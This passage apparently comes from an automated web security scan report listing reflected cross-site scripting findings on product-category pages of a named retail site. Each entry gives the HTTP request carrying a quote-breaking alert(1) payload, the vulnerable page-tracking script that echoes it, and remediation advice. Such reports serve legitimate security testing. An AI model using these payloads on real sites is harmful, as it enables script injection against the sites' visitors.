Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92813"-alert(1)-"4542ebe28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse92813"-alert(1)-"4542ebe28f8/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bj52mihcqnv87j59oben847e36; expires=Tue, 09-Nov-2010 17:11:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse92813"-alert(1)-"4542ebe28f8/");
//]]>
...[SNIP]...

1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9291"-alert(1)-"93024d59deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gufs30tkuq7tsvkseov3hags26; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1");
//]]>
...[SNIP]...

1.255. http://www.fredperry.com/women/dresses/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25282"-alert(1)-"158d6988500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women25282"-alert(1)-"158d6988500/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jfe33a0hqu3ps2h8sq0i0aat74; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women25282"-alert(1)-"158d6988500/dresses/");
//]]>
...[SNIP]...

1.256. http://www.fredperry.com/women/dresses/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb509"-alert(1)-"f266c581b8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/dressescb509"-alert(1)-"f266c581b8c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f086sn2pv4tc4qtl4v9125gp50; expires=Tue, 09-Nov-2010 17:07:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/dressescb509"-alert(1)-"f266c581b8c/");
//]]>
...[SNIP]...

1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/dresses/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e413f"-alert(1)-"b0fd3b1a901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=221l38upcp25ht23t6dhihv926; expires=Tue, 09-Nov-2010 17:05:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1");
//]]>
...[SNIP]...

1.258. http://www.fredperry.com/women/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb63"-alert(1)-"988eea48a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenceb63"-alert(1)-"988eea48a0f/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r2u0bkdmhpeoie140jqga16s62; expires=Tue, 09-Nov-2010 17:06:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenceb63"-alert(1)-"988eea48a0f/jackets/");
//]]>
...[SNIP]...

1.259. http://www.fredperry.com/women/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43191"-alert(1)-"f4d25c2ca9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/jackets43191"-alert(1)-"f4d25c2ca9e/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:07:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ao426si1mmbbjr0edk92t0aes3; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/jackets43191"-alert(1)-"f4d25c2ca9e/");
//]]>
...[SNIP]...

1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a4b8"-alert(1)-"3bbedec9e5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pfcri497r2ueetea7urcohu747; expires=Tue, 09-Nov-2010 17:05:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1");
//]]>
...[SNIP]...

1.261. http://www.fredperry.com/women/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11b29"-alert(1)-"273e9eef3e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women11b29"-alert(1)-"273e9eef3e5/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4o7qubhm2bo1i8btr5tc4oect0; expires=Tue, 09-Nov-2010 17:05:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women11b29"-alert(1)-"273e9eef3e5/knitwear/");
//]]>
...[SNIP]...

1.262. http://www.fredperry.com/women/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f7"-alert(1)-"884c352a4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/knitweare61f7"-alert(1)-"884c352a4e4/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mi0e2ngejjg98skppdnt2esdr6; expires=Tue, 09-Nov-2010 17:06:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/knitweare61f7"-alert(1)-"884c352a4e4/");
//]]>
...[SNIP]...

1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44619"-alert(1)-"dbe8083a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/knitwear/?44619"-alert(1)-"dbe8083a92f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jg2bea0k5a1bi85j6cfjfu1t93; expires=Tue, 09-Nov-2010 17:04:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/knitwear/?44619"-alert(1)-"dbe8083a92f=1");
//]]>
...[SNIP]...

1.264. http://www.fredperry.com/women/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c1d6"-alert(1)-"97d7c111880 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women4c1d6"-alert(1)-"97d7c111880/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ri1i2t61fio44aap2f55471d51; expires=Tue, 09-Nov-2010 17:06:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women4c1d6"-alert(1)-"97d7c111880/shirts/");
//]]>
...[SNIP]...

1.265. http://www.fredperry.com/women/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef5c3"-alert(1)-"8cfe24c93e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/shirtsef5c3"-alert(1)-"8cfe24c93e6/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j2ij7luab3bn191k5buu7ph790; expires=Tue, 09-Nov-2010 17:06:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/shirtsef5c3"-alert(1)-"8cfe24c93e6/");
//]]>
...[SNIP]...

1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2d16"-alert(1)-"a05c72fdefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0g3pt5mes9t1hnr5s0vl9v3pk6; expires=Tue, 09-Nov-2010 17:04:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
